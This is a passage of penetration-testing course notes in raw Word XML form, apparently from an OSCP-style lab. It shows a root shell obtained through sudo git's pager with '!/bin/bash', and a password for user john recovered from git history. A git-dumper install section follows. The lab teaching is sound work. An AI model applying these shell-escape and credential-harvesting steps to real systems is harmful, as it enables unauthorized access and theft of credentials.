        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, let's try the second abuse vector. This command opens the help menu in the default</w:t>
      </w:r>
      <w:hyperlink r:id="rId1104">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1105">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">pager</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. On Linux, one of the most popular pagers is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">less</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The commands to navigate the pager are similar to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can be used to execute code in the context of the user account that launched the pager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000329B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="825500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="554" name="image532.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image532.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1106"/>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329C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000329D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To execute code through the pager, we can enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> followed by a command or path to an executable file. As Figure 7 shows, we can enter a path to a shell. Let's use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to obtain an interactive shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000329E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000329F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="441" name="image423.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image423.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1107"/>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32A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A1">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nice! We successfully elevated our privileges on WEBSRV1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Armed with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges, we'll continue enumerating the system. Before doing so, let's search the Git repository for sensitive information first.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To do so, we'll change our current directory to the Git repository. We previously found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/srv/www/wordpress/.git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which means </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/srv/www/wordpress</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a git repo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git status</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to display the state of the Git working directory and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to show the commit history. We can find these on</w:t>
      </w:r>
      <w:hyperlink r:id="rId1108">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1109">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Git's Reference page</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3403600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1110"/>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32A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A8">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 27 shows that there are two commits in the repository. One is labeled as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">initial commit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and one as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Removed staging script and internal network access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. That's quite interesting as it indicates that the machine previously had access to the internal network. In addition, the first commit may contain a staging script that was removed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We could switch back to a specific commit by using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git checkout</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a commit hash. However, this could break the functionality of the web application and potentially disrupt the client's day to day operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032AA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A better approach is to use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git show</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which shows differences between commits. In our case, we'll supply the commit hash of the latest commit to the command as we are interested in the changes after the first commit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3619500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="448" name="image440.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image440.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1111"/>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32AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This reveals:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal IP (192.168.50.245)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Username (john)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="515"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password (dqsTwTpZPn#nL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nice! By displaying the differences between commits, we identified another set of credentials. The approach of automating tasks with</w:t>
      </w:r>
      <w:hyperlink r:id="rId1112">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1113">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">sshpass</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is commonly used to provide a password in a non-interactive way for scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before we conclude this section, let's add the username and password to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">creds.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's summarize what we've achieved in this section. We used the linPEAS automated enumeration script to identify potentially sensitive information and privilege escalation vectors. The script identified that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be run with sudo as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">daniela</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the WordPress directory is a Git repository, and a cleartext password is used in the WordPress database settings. By abusing the sudo command, we successfully elevated our privileges. Then, we identified a previously removed bash script in the Git repository and displayed it. This script contained a new username and password.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032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2B8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kpru9x9lqk6l" w:id="447"/>
      <w:bookmarkEnd w:id="447"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Git-dumper (to recreate repo)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032BA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .144 machine on XXXXXXXXX-A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032BC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to install git dumper:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install -y pipx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
